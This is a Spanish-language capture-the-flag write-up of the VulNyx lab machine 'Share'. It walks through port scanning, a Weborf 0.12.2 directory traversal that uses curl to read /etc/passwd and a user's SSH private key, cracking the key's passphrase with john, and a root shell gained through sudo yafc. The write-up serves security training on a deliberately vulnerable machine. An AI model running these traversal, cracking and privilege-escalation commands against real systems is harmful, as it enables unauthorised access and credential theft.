cd ~/blog

~/writeups/vulnyx/21-share.md

21 - Share

low Linux vulnyx 19-08-2024
Weborf 0.12.2 Directory TraversalSSH key passphrase crackingsudo yafc Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.81
 nmap -sCV -p 22,80,8080 -oN 02-targeted.txt 192.168.1.81
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 14:29 -04
Nmap scan report for 192.168.1.81
Host is up (0.00047s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_http-title: Weborf
| http-webdav-scan:
|   Server Type: Weborf (GNU/Linux)
|   WebDAV type: Apache DAV
|_  Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_http-server-header: Weborf (GNU/Linux)
| http-methods:
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest:
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 960
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-d5a087d5c9df4e4bb98b05155692ff61-apache2.service-ARYDJg/">systemd-private-d5a087d5c9df4e4bb98b05155692ff61-apache2.service-ARYDJg/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-d5a087d5c9df4e4bb98b05155692ff61-systemd-logind.service-M4VT5i/">systemd-private-d5a087d5c9df4e4bb98b05155692ff61-systemd-logind.service-M4VT5i/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-d5a087d5c9df4e4bb98b05155692ff61-systemd-timesyncd.service-uDxhHf/">systemd-private-d5a087d5c9df4e4bb98b05155692ff61-
|   HTTPOptions, RTSPRequest:
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5:
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=8/19%Time=66C38F20%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,401,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)
SF:\r\nContent-Length:\x20960\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W
SF:3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Webor
SF:f</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></t
SF:r><tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20hr
SF:ef=\"systemd-private-d5a087d5c9df4e4bb98b05155692ff61-apache2\.service-
SF:ARYDJg/\">systemd-private-d5a087d5c9df4e4bb98b05155692ff61-apache2\.ser
SF:vice-ARYDJg/</a></td><td>-</td></tr>\n<tr\x20style=\"background-color:\
SF:x20#DFDFDF;\"><td>d</td><td><a\x20href=\"systemd-private-d5a087d5c9df4e
SF:4bb98b05155692ff61-systemd-logind\.service-M4VT5i/\">systemd-private-d5
SF:a087d5c9df4e4bb98b05155692ff61-systemd-logind\.service-M4VT5i/</a></td>
SF:<td>-</td></tr>\n<tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</
SF:td><td><a\x20href=\"systemd-private-d5a087d5c9df4e4bb98b05155692ff61-sy
SF:stemd-timesyncd\.service-uDxhHf/\">systemd-private-d5a087d5c9df4e4bb98b
SF:05155692ff61-")%r(HTTPOptions,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf
SF:\x20\(GNU/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKC
SF:OL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/
SF:fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x2
SF:0200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POST,PUT,DE
SF:LETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x20<http:/
SF:/apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n")%r(Fou
SF:rOhFourRequest,12B,"HTTP/1\.1\x20404\x20Page\x20not\x20found:\x20Weborf
SF:\x20\(GNU/Linux\)\r\nContent-Length:\x20202\r\nContent-Type:\x20text/ht
SF:ml\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01
SF:\x20Transitional//EN\"><html><head><title>Weborf</title></head><body>\x
SF:20<H1>Error\x20404</H1>Page\x20not\x20found\x20<p>Generated\x20by\x20We
SF:borf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(Socks5,125,"HTTP/1
SF:\.1\x20400\x20Bad\x20request:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Len
SF:gth:\x20199\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20P
SF:UBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><he
SF:ad><title>Weborf</title></head><body>\x20<H1>Error\x20400</H1>Bad\x20re
SF:quest\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p></bo
SF:dy></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.79 seconds

El puerto 8080 corre Weborf 0.12.2, vulnerable a Directory Traversal. Buscamos el exploit y leemos /etc/passwd para identificar usuarios:

 searchsploit weborf 0.12.2
...
weborf 0.12.2 - Directory Traversal | linux/remote/14925.txt
...

 curl http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
...
tim:x:1000:1000:tim:/home/tim:/bin/bash
...

Aprovechamos el traversal para leer la clave privada SSH de tim:

 curl http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

La clave pide passphrase, así que la crackeamos con john:

 ssh2john id_rsa_tim > hash
 john -w=/home/wh01s17/Documents/wordlists/rockyou.txt hash
...
ilovetim         (id_rsa_tim)
...

Nos conectamos como tim con la passphrase ilovetim y obtenemos la primera flag:

 ssh tim@192.168.1.81 -i id_rsa_tim
Enter passphrase for key 'id_rsa_tim': ilovetim
tim@share:~$

Para escalar a root, revisamos los permisos sudo:

tim@share:/$ sudo -l
Matching Defaults entries for tim on share:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tim may run the following commands on share:
    (root) NOPASSWD: /usr/bin/yafc

Podemos ejecutar yafc (un cliente FTP) como root. Su consola interactiva ofrece el comando shell, que nos devuelve un intérprete con privilegios de root:

tim@share:/$ sudo yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.

yafc> shell
Executing '/bin/bash', use 'exit' to exit from shell...
root@share:/#

Obtenemos nuestra flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados